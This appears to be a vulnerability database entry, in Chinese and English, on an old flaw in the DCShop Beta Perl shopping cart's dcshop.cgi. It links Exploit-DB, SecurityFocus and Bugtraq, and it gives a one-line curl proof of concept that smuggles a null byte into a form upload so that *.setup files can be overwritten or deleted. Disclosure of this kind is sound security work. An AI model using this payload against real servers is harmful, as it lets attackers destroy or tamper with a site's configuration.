https://www.exploit-db.com/exploits/21352
https://www.securityfocus.com/bid/89736
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-030

DCShop1.002Beta版本的dcshop.cgi存在漏洞。远程攻击者可以借助数据库参数的空字符删除任意安装文件。

source: http://www.securityfocus.com/bid/4356/info

DCShop Beta is a freely available shopping cart system, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

It is possible to overwrite setup files (*.setup) by submitting attacker-supplied form data followed by a null character (%00). The attacker must use the POST method to submit data that is content-type multipart/form-data compliant. 

curl -F [email protected] http://host/cgi-bin/dcshop.cgi

where test.txt contains databasename.setup[nullbyte].

Dcscripts Dcshop 1.002 Beta

来源:BUGTRAQ
名称:20020325dcshop.cgianybodycandelete*.setupfordatabase
链接:http://archives.neohapsis.com/archives/bugtraq/2002-03/0302.html